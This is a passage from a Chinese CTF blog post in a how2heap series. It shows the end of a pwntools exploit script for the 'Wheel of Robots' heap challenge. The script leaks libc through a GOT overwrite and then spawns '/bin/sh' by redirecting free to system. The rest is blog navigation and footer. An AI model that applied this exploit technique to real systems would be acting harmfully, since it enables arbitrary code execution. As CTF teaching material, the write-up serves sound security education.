class="comment">#Delete Bender_ptr							1</span></span><br><span class="line">add(<span class="number">6</span>,powerful=<span class="number">0x20</span>)<span class="comment">#Add Destructor small chunk     				2</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">3</span>)<span class="comment">#				 					1</span></span><br><span class="line"></span><br><span class="line">overflow_Bender_to(<span class="number">1</span>)</span><br><span class="line">free_GOT=<span class="number">0x603018</span></span><br><span class="line">puts_plt=<span class="number">0x400830</span></span><br><span class="line">puts_GOT=<span class="number">0x603028</span></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(free_GOT))<span class="comment">#change Chain_smoker_ptr to &amp;free_GOT by Bender</span></span><br><span class="line">change(<span class="number">4</span>,p64(puts_plt))<span class="comment">#*free_GOT-&gt;puts_plt by Chain_smoker</span></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(puts_GOT))<span class="comment">#change Chain_smoker_ptr to &amp;puts_GOT</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">delete(<span class="number">4</span>)<span class="comment">#puts(&amp;puts_GOT)							0	</span></span><br><span class="line"></span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x6f690</span></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'libc_base'</span>+hex(libc_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line">system_address=libc_base+<span class="number">0x45390</span></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(free_GOT))<span class="comment">#change Destructor_ptr to &amp;free_GOT by Bender</span></span><br><span class="line">change(<span class="number">6</span>,p64(system_address))<span class="comment">#*free_GOT to system_address by Destructor_ptr</span></span><br><span class="line">change(<span class="number">2</span>,<span class="string">'/bin/sh\x00'</span>)<span class="comment"># *Bender_ptr = '/bin/sh\x00'</span></span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#system(Bender_ptr)-&gt;system("/bin/sh")</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/how2heap/" rel="tag"># how2heap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/01/31/how2heap-fastbin-dup-consolidate-SleepyHolder/" rel="prev" title="how2heap - fastbin_dup_consolidate&SleepyHolder">
      <i class="fa fa-chevron-left"></i> how2heap - fastbin_dup_consolidate&SleepyHolder
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/06/how2heap-house-of-spirit-OREO/" rel="next" title="how2heap - house_of_spirit&OREO">
      how2heap - house_of_spirit&OREO <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#how2heap-unsafe-unlink-amp-stkof、Wheel-of-Robots"><span class="nav-number">1.</span> <span class="nav-text">how2heap - unsafe_unlink&amp;stkof、Wheel of Robots</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#unsafe-unlink-c"><span class="nav-number">1.1.</span> <span class="nav-text">unsafe_unlink.c:</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#stkof"><span class="nav-number">2.</span> <span class="nav-text">stkof</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析"><span class="nav-number">2.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#new"><span class="nav-number">2.1.1.</span> <span class="nav-text">new:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fill-chunk"><span class="nav-number">2.1.2.</span> <span class="nav-text">fill_chunk:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Free："><span class="nav-number">2.1.3.</span> <span class="nav-text">Free：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#todo"><span class="nav-number">2.1.4.</span> <span class="nav-text">todo:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit："><span class="nav-number">2.2.</span> <span class="nav-text">Exploit：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整EXP"><span class="nav-number">2.3.</span> <span class="nav-text">完整EXP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Wheel-of-Robots"><span class="nav-number">3.</span> <span class="nav-text">Wheel of Robots</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析-1"><span class="nav-number">3.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#add："><span class="nav-number">3.1.1.</span> <span class="nav-text">add：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#输入选择部分"><span class="nav-number">3.1.1.1.</span> <span class="nav-text">输入选择部分</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Tinny-Tim-对应1-："><span class="nav-number">3.1.1.2.</span> <span class="nav-text">Tinny_Tim(对应1)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Bender-对应2-："><span class="nav-number">3.1.1.3.</span> <span class="nav-text">Bender(对应2)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Devil-对应3-："><span class="nav-number">3.1.1.4.</span> <span class="nav-text">Devil(对应3)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Chain-smoker-对应4-："><span class="nav-number">3.1.1.5.</span> <span class="nav-text">Chain_smoker(对应4)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Billionaire-Bot-对应5-："><span class="nav-number">3.1.1.6.</span> <span class="nav-text">Billionaire_Bot(对应5)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Destructor-对应6-："><span class="nav-number">3.1.1.7.</span> <span class="nav-text">Destructor(对应6)：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#total："><span class="nav-number">3.1.1.8.</span> <span class="nav-text">total：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#delete："><span class="nav-number">3.1.2.</span> <span class="nav-text">delete：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#change："><span class="nav-number">3.1.3.</span> <span class="nav-text">change：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#startwheel："><span class="nav-number">3.1.4.</span> <span class="nav-text">startwheel：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit"><span class="nav-number">3.2.</span> <span class="nav-text">Exploit:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整EXP-1"><span class="nav-number">3.3.</span> <span class="nav-text">完整EXP</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Coldshield"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Coldshield</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Coldshield</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.2
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : false,
      appId      : 'APq34QYuAOTUtOPWMtySvyvt-gzGzoHsz',
      appKey     : 'xRjoMerK1OFN4Lad4pyXT0Bs',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
